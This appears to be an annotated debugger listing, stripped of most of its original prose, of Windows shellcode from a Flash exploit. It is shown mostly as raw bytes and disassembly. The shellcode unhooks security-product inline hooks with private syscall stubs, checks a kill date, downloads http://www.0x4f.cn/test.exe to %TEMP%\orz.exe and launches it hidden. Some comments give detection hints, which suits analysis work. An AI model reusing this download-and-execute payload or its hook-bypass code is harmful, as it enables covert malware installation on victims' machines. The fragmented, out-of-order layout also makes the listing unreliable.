
flash shellcode

flash shellcode

win 9,0,115,0ie.swf.swf
shellcode 0xEB shellcode
OD shellcode
flash
shellcode ActiveX shellcode
shellcode
shellcode shellcode xor API
shellcode

1. shellcode shellcode
ExitThread flash
URL
2. kernel32.dll ZwCreateProcessEx (on Win2000: NtCreateProcess)
ZwWriteVirtualMemory inline hookhook
CreateProcessInternalW inline hook
MAXTHON API HOOK
anti
hook

3. CreateProcessInternalA shellcode
WinExec
shellcode (1)(2)

xor
00407000 > /EB 16
jmp short 00407018                  ; skip the decoder body; the call at 00407018 comes straight back to 00407002
00407002 |5B
pop ebx                             ; ebx = return address pushed by `call 00407002` = 0040701D, the start of the encoded body (position-independent get-PC)
00407003 |33C9
xor ecx, ecx                        ; ecx = 16-bit word index
00407005 |66:B8 2245 mov ax, 4522   ; initial XOR key
00407009 |66:31044B
xor word ptr [ebx+ecx*2], ax        ; decode one word in place (self-modifying: the page must be writable as well as executable)
0040700D |41
inc ecx

; (1)F8
; (3)
; (the F-key notes in this listing are presumably the author's OllyDbg step keys: F7 step-into, F8 step-over, F4 run-to-selection, F9 run)

; xor

0040700E |40
inc eax                             ; key += 1 per word: a rolling key, so a constant single-key XOR brute force will not recover the body; replay this loop (or emulate) to decode
0040700F |66:81F9 6201 cmp

cx, 162                             ; 0x162 words = 0x2C4 bytes are decoded, 0040701D..004072E0 (covers code, hash table and URL string)

00407014 ^|7C F3
jl short 00407009                   ; signed compare on a 16-bit counter; harmless here because cx never approaches 0x7FFF
00407016 |EB 05
jmp short 0040701D                  ; fall into the freshly decoded code

00407018 \E8 E5FFFFFF call 00407002 ; pushes 0040701D as return address, popped into ebx above

; (4) F4
; (5) F8
; (2)F7

kernel32.dll API
PEB kernel32.dll
API
0040701D

00407022

00407023
00407025
00407026
00407029
n
0040702F
00407032
00407035
00407036
ebp
00407039
0040703B
00407041

E9 65020000
5F

pop

jmp

00407287

edi

; (6)
; (8)

6A 30
push 30
59
pop ecx                             ; push/pop instead of `mov ecx,30` to avoid NUL bytes
64:8B01
mov eax, dword ptr fs:[ecx]         ; eax = TEB->Peb (fs:[0x30])
8B98 A8000000 mov ebx, dword ptr [eax+A8]  ; ebx = OS version field at PEB+0xA8, used below as a 0/1/2 index selecting the Win2000/XP/2003 variants
8B40 0C
8B70 1C
AD
8B68 08

; _PEB
; _PEB.OSMinorVersion — the dispatch indexes 0/1/2 map to Win2000/XP/2003, i.e. the minor version of NT 5.x; the original notes call this OSMajorVersion, which could not tell the three apart (verify against the PEB layout of the target build)

mov eax, dword ptr [eax+C]          ; eax = PEB->Ldr


mov esi, dword ptr [eax+1C]         ; esi = Ldr->InInitializationOrderModuleList.Flink (first entry)
lods dword ptr [esi]                ; eax = second entry in initialization order, expected to be kernel32.dll on the targeted 2000/XP/2003
mov

ebp, dword ptr [eax+8]              ; ebp = DllBase of that entry = kernel32 base. NOTE(review): this "second module is kernel32" assumption is specific to these OS versions and does not hold on later Windows releases

; (9)kernel32.dll

8BF7
mov esi, edi                        ; esi = edi = table of API-name hashes left by `call 00407022` at 00407287; each slot is overwritten in place with the resolved address
81EC 00020000 sub esp, 200          ; 0x200 bytes of scratch stack (STARTUPINFO/PROCESS_INFORMATION and string buffers later)
85DB
test ebx, ebx

00407043 75 07
jnz short 0040704C                  ; version index != 0 (XP/2003): keep the NtCreateProcessEx hash
; (10) 2000
XP XP
00407045 C746 24 C9525E5>mov dword ptr [esi+24], 535E52C9   ; Win2000 only: replace the NtCreateProcessEx hash with the NtCreateProcess hash (2000 has no ...Ex variant); 535E52C9 is a usable signature constant
; 2000
2000 NtCreateProcess XP
NtCreateProcessEx
0040704C 6A 09
push 9
0040704E 59
pop ecx                             ; resolve the first 9 kernel32 exports of the table below
0040704F E8 EE010000 call 00407242  ; export-table walk by hash (see 00407242): matches [edi], stores the address at [edi], advances edi
; (11) F8

00407054 ^ E2 F9
loopd short 0040704F
; F4
API esi [esi+XX] XX

0x00 LoadLibraryA

0x04 GetTempPathA
0x08 DeleteFileA
0x0C CreateProcessInternalA
0x10 ExitThread,
0x14 VirtualProtect
0x18 CreateProcessInternalW
0x1C CompareFileTime
0x20 GetSystemTimeAsFileTime
retn
retn
anti-debug
00407056 40
inc eax                             ; eax = last resolved address (GetSystemTimeAsFileTime) + 1
00407057 8038 C3
cmp byte ptr [eax], 0C3             ; scan forward inside kernel32 for the first 0xC3 byte; any 0xC3 qualifies, including one inside an immediate or a longer instruction

; GetSystemTimeAsFileTime

0040705A ^ 75 FA
jnz short 00407056
retn
0040705C 8946 30
mov dword ptr [esi+30], eax         ; [esi+30] = address of a `retn` inside kernel32, consumed by the call trampoline at 0040718E (presumably so API calls appear to return into kernel32 rather than into the shellcode)
7C801881

; (12)
;

kernel32.dll NATIVE API


0040705F 6A 02
00407061 59

push 2
pop ecx                             ; two more names, resolved through kernel32's IMPORT table (functions kernel32 imports from ntdll)

00407062 E8 9E010000 call 00407205  ; import-table walk (see 00407205): yields kernel32's IAT slot, i.e. the ntdll address kernel32 itself calls

00407067 ^ E2 F9
loopd short 00407062

esi [esi+XX] XX
0x24 ZwCreateProcessExwin2000 NtCreateProcess
0x28 ZwWriteVirtualMemory
LoadLibraryA urlmon.dll URLDownloadToFileA
call push jmp
00407069 6A 01
push 1
0040706B 59
pop ecx                             ; ecx = argument count for the call trampoline at 0040718E
0040706C 68 6F6E0000 push 6E6F
00407071 68 75726C6D push 6D6C7275  ; "urlm" + "on\0\0" built on the stack, so the DLL name is not a plaintext string in the body
00407076 54
push esp
; 'urlmon'
00407077 8B06
mov eax, dword ptr [esi]            ; eax = LoadLibraryA
; LoadLibraryA
00407079 E8 10010000 call 0040718E  ; LoadLibraryA("urlmon") through the push/jmp trampoline instead of a plain call
; (13) anti-debug
F9
0040707E 95
xchg eax, ebp                       ; ebp = urlmon.dll base (LoadLibraryA result); the kernel32 base is no longer needed
; urlmon.dll ebp
0040707F E8 BE010000 call 00407242  ; resolve URLDownloadToFileA from urlmon's export table into [esi+2C]
; (14)

F8 URLDownloadToFileA
URLDownloadToFileA [esi+2C]

00407084 68 3D400000 push 403D


00407089 6A FF
push -1
0040708B 6A FF
push -1
0040708D 3E:DB2C24
fld tbyte ptr ds:[esp]              ; loads the 80-bit float just built on the stack; no result is used, so presumably an anti-emulation trick (an FPU op with an unusual DS-prefixed encoding) — TODO confirm
00407091

00407092
00407093
00407094
00407097
00407099
0040709E
004070A3
004070A4
004070A5
004070A8

50

push eax

50
push eax                            ; 8-byte FILETIME buffer
54
push esp
FF56 20
call dword ptr [esi+20]             ; GetSystemTimeAsFileTime(&buffer)
8BC4
mov eax, esp                        ; eax = &current time
68 6EC2C801 push 1C8C26E
68 00C0B336 push 36B3C000           ; embedded FILETIME 0x01C8C26E36B3C000 (roughly mid-2008 when read as a FILETIME — verify)
54
push esp                            ; lpFileTime2 = &embedded constant
50
push eax                            ; lpFileTime1 = &current time
FF56 1C
call dword ptr [esi+1C]             ; CompareFileTime: returns 1 when the current time is later than the constant
48
dec eax                             ; 1 -> 0 exactly when the current time is past the embedded date

004070A9 75 03
jnz short 004070AE                  ; still before the date: continue

004070AB FF56 10
call dword ptr [esi+10]             ; ExitThread: built-in expiry (kill-date) check; when replaying, set the clock back or patch this jnz
shellcode

; FILETIME

; GetSystemTimeAsFileTime

; CompareFileTime
; (16)
; ExitThread

ExitThread
EIP
shellcode NATIVE API

NATIVE API inline hook


hook shellcode
CreateProcessInternalW

shellcode
NATIVE API PEB
inline hook shellcode
shellcode NATIVE API
PEB
shellcode

004070AE 6A 30

push 30

004070B0 59
pop ecx                             ; ecx = 0x30 serves both as the TEB offset and as the `rep movs` count below (0x30 dwords = 0xC0 bytes)
004070B1 64:8B19
mov ebx, dword ptr fs:[ecx]         ; ebx = PEB
004070B4 8DAB 00040000 lea ebp, dword ptr [ebx+400]   ; ebp = PEB+0x400: scratch area in the writable PEB page that will hold the private syscall stubs

004070BA 8B9B A8000000 mov ebx, dword ptr [ebx+A8]    ; ebx = OS version index (0/1/2) again


XP 2003
004070C0 8BFD
mov edi, ebp                        ; copy destination
004070C2 56
push esi                            ; preserve the API table pointer across the copy

; (17) PEB
; 2000

004070C3 E9 E0000000 jmp 004071A8   ; 004071A8 executes `call 004070C8`, which pushes 004071AD = first byte of the stub code


; (18)
004070C8 5E
pop esi                             ; esi = 004071AD, copy source
; (20)
004070C9 F3:A5
rep movs dword ptr es:[edi], dword ptr [esi]   ; copy the int 2E / KiFastSystemCall stubs into PEB+0x400. NOTE(review): control is later transferred there, so this relies on the PEB page being executable (no NX enforcement for this process) — TODO confirm on the target
;
NATIVE API inline hook
004070CB 5E
pop esi                             ; restore the API table pointer

ZwCreateProcessExwin2000 NtCreateProcess
ZwWriteVirtualMemory
push XXX,retn
win2000/XP/2003
004070CC 8B7E 24

mov

edi, dword ptr [esi+24]             ; edi = ntdll!ZwCreateProcessEx (NtCreateProcess on 2000), taken from kernel32's IAT

; ZwCreateProcessEx

004070CF E8 25010000 call 004071F9  ; VirtualProtect(edi, 4, 0x20) — see 004071F9 for the caveats (size, protection constant, unchecked return)


; VirtualProtect 0x20

004070D4 6A 1A
push 1A                             ; [esp+8]: offset of the 2003 stub inside the copied block
; 2003 NtCreateProcessEx

004070D6 6A 0D
push 0D                             ; [esp+4]: XP stub offset
; XP NtCreateProcessEx

004070D8 6A 00
push 0                              ; [esp+0]: 2000 stub offset
; 2000 NtCreateProcess

004070DA 8BC5
mov eax, ebp
004070DC 03049C
add eax, dword ptr [esp+ebx*4]      ; eax = PEB+0x400 + offset[os]; the three pushes are left on the stack
; eax = address of the private NtCreateProcess(Ex) stub

004070DF C607 68
mov byte ptr [edi], 68              ; overwrite the first 6 bytes of the ntdll export with `push <stub>` / `ret`
; "push"
004070E2 47
inc edi
004070E3 AB
stos dword ptr es:[edi]             ; imm32 = stub address
; bytes 1..4 of the detour
004070E4 C607 C3
mov byte ptr [edi], 0C3             ; ret -> every caller of the export (including kernel32) now lands in the private stub; any inline hook a security product had placed here is bypassed and clobbered
; ret
004070E7 8B7E 28
mov edi, dword ptr [esi+28]         ; same treatment for ntdll!ZwWriteVirtualMemory
; ZwWriteVirtualMemory
004070EA E8 0A010000 call 004071F9  ; VirtualProtect again
004070EF 6A 3D
push 3D                             ; 2003 stub offset
; 2003 ZwWriteVirtualMemory
ZwCreateProcess(Ex)
004070F1 6A 36
push 36                             ; XP stub offset
004070F3 6A 27
push 27                             ; 2000 stub offset
004070F5 8BC5
mov eax, ebp
004070F7 03049C
add eax, dword ptr [esp+ebx*4]      ; eax = private NtWriteVirtualMemory stub for this OS
004070FA C607 68
mov byte ptr [edi], 68              ; push imm32
004070FD 47
inc edi

004070FE AB
stos dword ptr es:[edi]
004070FF C607 C3
mov byte ptr [edi], 0C3             ; ret
ZwCreateProcessEx ZwWriteVirtualMemory

MAXTHON2
MAXTHON2 MAXTHON2
ZwCreateProcessEx ZwWriteVirtualMemory IAT HOOK

shellcode kernel32.dll ZwCreateProcessEx ZwWriteVirtualMemory

MAXTHON2 shellcode
shellcode kernel32.dll MAXTHON2 hook
MAXTHON2 dll
shellcode inline hook

MAXTHON2 IAT HOOK

CreateProcessInternalW
MAXTHON2 CreateProcessInternalW inline hook
00407102
00407105
0040710A
0040710F
00407114
00407119

8B7E 18
mov edi, dword ptr [esi+18]         ; edi = kernel32!CreateProcessInternalW
E8 EF000000 call 004071F9           ; VirtualProtect on its first bytes
68 68080A00 push 0A0868             ; [esp+8] 2003: bytes 68 08 0A 00 = `push 0A08h` prologue
68 68080A00 push 0A0868             ; [esp+4] XP: same prologue
68 558BEC6A push 6AEC8B55           ; [esp+0] 2000: bytes 55 8B EC 6A = `push ebp / mov ebp,esp / push ...`
8B049C
mov eax, dword ptr [esp+ebx*4]      ; pick the hard-coded original prologue dword for this OS

0040711C
inline hook
0040711D
0040711F
00407120
00407121
00407123
00407126

AB

stos dword ptr es:[edi]             ; rewrite bytes 0..3 of CreateProcessInternalW

33C0
50
50
6A FF
8B049C
AA

xor eax, eax


push eax                            ; [esp+8] 2003: fifth byte 00
push eax                            ; [esp+4] XP: fifth byte 00
push -1                             ; [esp+0] 2000: fifth byte FF (completes `push -1`)
mov eax, dword ptr [esp+ebx*4]
stos byte ptr es:[edi]              ; byte 4: exactly the 5 bytes a `jmp rel32` inline hook occupies are restored from constants, removing any detour installed on CreateProcessInternalW. NOTE(review): the constants are build-specific; on a build whose prologue differs this corrupts kernel32

; CreateProcessInternalW

shellcode
Temp orz.exe
00407127
0040712D
0040712E
00407133

8DBE 33010000 lea edi, dword ptr [esi+133]   ; edi = buffer inside the (writable) body at esi+0x133, past the URL string


57
push edi
68 FF000000 push 0FF
FF56 04
call dword ptr [esi+4]              ; GetTempPathA(0xFF, edi); the returned length is used as an offset but never checked for 0 or overflow

; GetTempPathA

00407136 03C7

add

eax, edi                            ; eax = end of the temp path (which ends in a backslash)
; temp

00407138 C700 6F727A2E mov dword ptr [eax], 2E7A726F   ; "orz."

0040713E C740 04 6578650>mov dword ptr [eax+4], 657865  ; "exe\0" -> "%TEMP%\orz.exe": the drop path, a concrete host IOC


"orz.exe"

00407145 57
00407146 FF56 08

push edi
call dword ptr [esi+8]              ; DeleteFileA(path): remove a stale copy before downloading

; DeleteFileA

URLDownloadToFileA http://www.0x4f.cn/test.exe
orz.exe
00407149
0040714B
0040714C
0040714D

33DB
53
53
57

xor ebx, ebx                        ; ebx (the OS index) is clobbered here; nothing in the remaining listing reads it again


push ebx                            ; lpfnCB = NULL
push ebx                            ; dwReserved = 0
push edi                            ; szFileName = %TEMP%\orz.exe

0040714E 8D46 34
lea eax, dword ptr [esi+34]         ; URL string embedded at [esi+0x34]
"http://www.0x4f.cn/test.exe"
00407151 50
push eax                            ; szURL
00407152 53
push ebx                            ; pCaller = NULL
00407153 FF56 2C
call dword ptr [esi+2C]             ; URLDownloadToFileA: plain HTTP, no integrity check on the payload, and the HRESULT is ignored — execution continues into CreateProcess even if the download failed

; URL

; URLDownloadToFileA

shellcode CreateProcessInternalA
CreateProcessInternalW ZwCreateProcessEx ZwWriteVirtualMemory
CreateProcessInternalA
00407156
00407158
0040715A
0040715C
0040715D
0040715E
0
00407160
00407167
00407169
0040716C
0040716D
0040716E
0040716F
00407170
00407171

33C0
8BFC
6A 12
59
AB
^ E2 FD

xor eax, eax


mov edi, esp                        ; zero 0x12 dwords (0x48 bytes) at [esp] and above: the area used for PROCESS_INFORMATION / STARTUPINFOA below
push 12
pop ecx
stos dword ptr es:[edi]
loopd short 0040715D                ; leaves ecx = 0, reused as the NULL arguments below

66:C74424 3C 01>mov word ptr [esp+3C], 101   ; with STARTUPINFOA presumably at edi+0x10 this is dwFlags = 0x101 (STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES) while wShowWindow stays 0 (SW_HIDE): the dropped EXE runs without a visible window — TODO confirm the field layout


8BFC
mov edi, esp                        ; edi = lpProcessInformation
8D47 10
lea eax, dword ptr [edi+10]         ; eax = lpStartupInfo (cb is never filled in)
51
push ecx                            ; phNewToken = NULL
57
push edi                            ; lpProcessInformation
50
push eax                            ; lpStartupInfo
51
push ecx                            ; lpCurrentDirectory = NULL
51
push ecx                            ; lpEnvironment = NULL
51
push ecx                            ; dwCreationFlags = 0

00407172
00407173
00407174
00407175

51
51
51
51

push
push
push
push

ecx                                 ; bInheritHandles = 0
ecx                                 ; lpThreadAttributes = NULL
ecx                                 ; lpProcessAttributes = NULL
ecx                                 ; lpCommandLine = NULL

00407176
0040717C
0040717D
0040717E
00407181
00407187

8D96 33010000 lea edx, dword ptr [esi+133]   ; lpApplicationName = %TEMP%\orz.exe


52
push edx
51
push ecx                            ; hToken = NULL
FF56 0C
call dword ptr [esi+C]              ; CreateProcessInternalA(...) — 12 arguments; the A variant is used because the W variant and the Nt* path were just un-hooked and would otherwise be the observed call; return value is ignored
81C4 54020000 add esp, 254          ; drop the scratch area and leftover pushes
61
popad                               ; the matching pushad is not in the visible listing (presumably in the host/exploit code before 00407000)

00407188 FF71 EC
push dword ptr [ecx-14]

0040718B C2 0400
retn 4                              ; hand control back to the Flash host instead of ExitThread, so the browser keeps running after the drop (as the author's notes describe)

; orz.exe

; CreateProcessInternalA

call
0040718E
00407191
00407192
00407193
00407194
00407196
00407198
0040719A
0040719C
0040719F
004071A0
004071A1
004071A3
004071A5
retn
004071A6

8B56 30
41
5B
52
03E1
03E1
03E1
03E1
83EC 04
5A
53
8BDA
^ E2 F7
52
FFE0

mov edx, dword ptr [esi+30]         ; edx = address of a `retn` byte inside kernel32 (found at 00407056)


inc ecx                             ; ecx = argument count + 1
pop ebx                             ; ebx = this trampoline's own return address
push edx
add esp, ecx
add esp, ecx
add esp, ecx
add esp, ecx                        ; esp += 4*ecx
sub esp, 4
pop edx
push ebx
mov ebx, edx
loopd short 0040719C                ; rotates the return address and the arguments through the frame; the author's note above describes the intent as replacing `call` with `push`/`jmp`
push edx
jmp                                 ; tail-jump into the API in eax rather than calling it. NOTE(review): where the kernel32 `retn` address ends up for ecx=1 (the only caller, 00407079) is not obvious from the listing — single-step before relying on the "returns via kernel32" reading
eax

; (14)

;
; jmp API

call
004071A8 E8 1BFFFFFF
F7

call 004070C8                       ; only purpose: push 004071AD (first byte of the stub block) so 004070C8 can pop it as the `rep movs` source

; (19)

NATIVE API
004071AD 6A 29
004071AF 58

push 29
pop eax                             ; eax = 0x29, NtCreateProcess service number on Win2000

; win2000 NtCreateProcess

004071B0 36:8D5424 04 lea edx, dword ptr [esp+4]   ; edx = argument pointer (Win2000 int 2E convention)


004071B5 CD 2E
int 2E                              ; direct system call: ntdll's stub, and any user-mode hook on it, is never executed
004071B7 C2 2000
retn 20                             ; cleans 8 dwords of arguments; must match what the kernel32 caller pushed, since this stub stands in for ntdll's
004071BA
004071BC
004071BD
004071C2
004071C4

6A 30
push 30
58
pop eax                             ; 0x30 = NtCreateProcessEx on XP
BA 0003FE7F mov edx, 7FFE0300       ; SharedUserData->SystemCall (KiFastSystemCall)
FF12
call dword ptr [edx]
C2 2000
retn 20

; XP ZwCreateProcessEx

004071C7
004071C9
004071CA
004071CF
004071D1

6A 32
push 32
58
pop eax                             ; 0x32 = NtCreateProcessEx on 2003
BA 0003FE7F mov edx, 7FFE0300
FF12
call dword ptr [edx]
C2 2400
retn 24                             ; 9 dwords on 2003

; win2003 ZwCreateProcessEx

004071D4 B8 F0000000 mov eax, 0F0   ; 0xF0 = NtWriteVirtualMemory on Win2000


ZwWriteVirtualMemory
004071D9 36:8D5424 04 lea edx, dword ptr [esp+4]
004071DE CD 2E
int 2E
004071E0 C2 1400
retn 14                             ; 5 arguments

; win2000

004071E3 B8 15010000 mov eax, 115   ; 0x115 = NtWriteVirtualMemory on XP


004071E8 EB 05
jmp short 004071EF                  ; share the KiFastSystemCall tail with the 2003 stub

; XP ZwWriteVirtualMemory

004071EA B8 1F010000 mov eax, 11F   ; 0x11F = NtWriteVirtualMemory on 2003. NOTE(review): service numbers are hard-coded per OS version only; a build whose table differs would invoke the wrong service. Detection angle: `int 2E` / SharedUserData->SystemCall reached from a non-ntdll address (here a PEB page) is anomalous


ZwWriteVirtualMemory XP
004071EF BA 0003FE7F mov edx, 7FFE0300
004071F4 FF12
call dword ptr [edx]
004071F6 C2 1400
retn 14

; win2003

VirtualProtect API
004071F9 52
push edx                            ; scratch dword that receives lpflOldProtect
004071FA 54
push esp                            ; &oldprotect
004071FB 6A 04
push 4                              ; dwSize = 4, although callers write 6 bytes (push imm32 / ret); only safe because protection is page-granular and the target is not at a page end
004071FD 6A 20
push 20                             ; 0x20 = PAGE_EXECUTE_READ, not PAGE_EXECUTE_READWRITE (0x40); a reviewer would expect 0x40 before writing into code — TODO confirm the subsequent write actually succeeds on the target
004071FF 57
push edi                            ; lpAddress
00407200 FF56 14
call dword ptr [esi+14]             ; VirtualProtect; the return value is not checked
0x20
00407203 5A
pop edx                             ; discard oldprotect (the original protection is never restored)
00407204 C3
retn

; VirtualProtect

kernel32.dll NATIVE API shellcode

00407205
00407206
00407209
0040720A
0040720E
0040720F
00407211
00407213
00407215
00407217
00407218
00407219
0040721C
00407220
00407221
00407223
00407226
00407228
0040722A
0040722D
0040722F
00407230
00407232
00407234
00407235
00407237
0040723A
0040723C
0040723F
00407240
00407241

51
push ecx
8B45 3C
mov eax, dword ptr [ebp+3C]         ; e_lfanew
45
inc ebp
8B5C28 7F
mov ebx, dword ptr [eax+ebp+7F]     ; [base + e_lfanew + 0x80] = IMAGE_DIRECTORY_ENTRY_IMPORT RVA (ebp pre-incremented so 0x80 need not be encoded)
4D
dec ebp
03DD
add ebx, ebp                        ; ebx = first IMAGE_IMPORT_DESCRIPTOR; only this one descriptor (kernel32's first import DLL, assumed ntdll) is walked
8B13
mov edx, dword ptr [ebx]            ; OriginalFirstThunk RVA (import lookup table)
03D5
add edx, ebp
33C9
xor ecx, ecx
49
dec ecx                             ; ecx = -1, pre-incremented per entry
41
inc ecx
8B048A
mov eax, dword ptr [edx+ecx*4]      ; IMAGE_IMPORT_BY_NAME RVA; no terminator check, so an unmatched hash walks past the table
8D4428 02
lea eax, dword ptr [eax+ebp+2]      ; skip the 2-byte Hint -> function name
60
pushad
33C9
xor ecx, ecx
0FBE10
movsx edx, byte ptr [eax]
3AD6
cmp dl, dh                          ; dh is 0 for printable characters, so this is a NUL-terminator test
74 08
je short 00407232
C1C9 07
ror ecx, 7
03CA
add ecx, edx                        ; hash = ror(hash, 7) + char; same function as the export resolver at 00407242 — the precomputed hashes at 0040728C are a usable signature
40
inc eax
^ EB F1
jmp short 00407223
390F
cmp dword ptr [edi], ecx
61
popad
^ 75 E1
jnz short 00407218
8B43 10
mov eax, dword ptr [ebx+10]         ; FirstThunk RVA = IAT
03C5
add eax, ebp
8B0488
mov eax, dword ptr [eax+ecx*4]      ; IAT slot: the address kernel32 actually calls (an IAT hook would be returned as well)
AB
stos dword ptr es:[edi]             ; replace the hash with the address, advance edi
59
pop ecx
C3
retn

PE API
N
00407242
00407243
00407244
00407247
0040724B
0040724D
0040724E
00407251

51
push ecx
56
push esi
8B75 3C
mov esi, dword ptr [ebp+3C]         ; e_lfanew
8B742E 78
mov esi, dword ptr [esi+ebp+78]     ; IMAGE_DIRECTORY_ENTRY_EXPORT RVA
03F5
add esi, ebp                        ; esi = IMAGE_EXPORT_DIRECTORY
56
push esi
8B76 20
mov esi, dword ptr [esi+20]         ; AddressOfNames RVA
03F5
add esi, ebp

00407253
00407255
00407256
00407257
00407258
0040725A
0040725C
0040725F
00407261
00407263
00407266
00407268
00407269
0040726B
0040726D
0040726F
00407270
00407273
00407275
00407279
0040727C
0040727E
00407281
00407283
00407284
00407285
00407286

33C9
xor ecx, ecx
49
dec ecx
41
inc ecx                             ; ecx = name index; never bounded by NumberOfNames, so an unmatched hash reads past the table
AD
lods dword ptr [esi]                ; next name RVA
03C5
add eax, ebp
33DB
xor ebx, ebx
0FBE10
movsx edx, byte ptr [eax]
3AD6
cmp dl, dh                          ; NUL-terminator test (dh = 0)
74 08
je short 0040726B
C1CB 07
ror ebx, 7
03DA
add ebx, edx                        ; hash = ror(hash, 7) + char
40
inc eax
^ EB F1
jmp short 0040725C
3B1F
cmp ebx, dword ptr [edi]            ; compare with the precomputed hash at [edi]
^ 75 E7
jnz short 00407256
5E
pop esi                             ; export directory
8B5E 24
mov ebx, dword ptr [esi+24]         ; AddressOfNameOrdinals
03DD
add ebx, ebp
66:8B0C4B
mov cx, word ptr [ebx+ecx*2]        ; ordinal for this name; the upper half of ecx stays whatever the index left there (zero only while the index is < 0x10000)
8B5E 1C
mov ebx, dword ptr [esi+1C]         ; AddressOfFunctions
03DD
add ebx, ebp
8B048B
mov eax, dword ptr [ebx+ecx*4]      ; function RVA (forwarded exports are not handled)
03C5
add eax, ebp
AB
stos dword ptr es:[edi]             ; overwrite the hash with the resolved address, advance edi
5E
pop esi
59
pop ecx
C3
retn

00407287 E8 96FDFFFF

call 00407022                       ; reached by the jmp at 0040701D; pushes 0040728C — the start of the API hash table that follows — which 00407022 pops into edi

; (7)call F7

API shellcode
API URLshellcode [esi+XX]

0x00 LoadLibraryA
0x04 GetTempPathA
0x08 DeleteFileA
0x0C CreateProcessInternalA
0x10 ExitThread,
0x14 VirtualProtect
0x18 CreateProcessInternalW
0x1C CompareFileTime
0x20 GetSystemTimeAsFileTime
0x24 ZwCreateProcessEx (on Win2000: NtCreateProcess)
0x28 ZwWriteVirtualMemory

0x2C URLDownloadToFileA
0x30 address of a `retn` (0xC3) byte inside kernel32, located by the byte scan at 00407056
0x34 ASCII "http://www.0x4f.cn/test.exe"
shellcode shellcode
shellcode

shellcode shellcode

update: win2000 win2003 shellcode


NATIVE API inline hook win2000/XP/2003 NATIVE API
shellcode _PEB.OSMinorVersion (the 0/1/2 index that selects the Win2000/XP/2003 stubs; all three are NT 5.x, so the major version alone could not distinguish them)
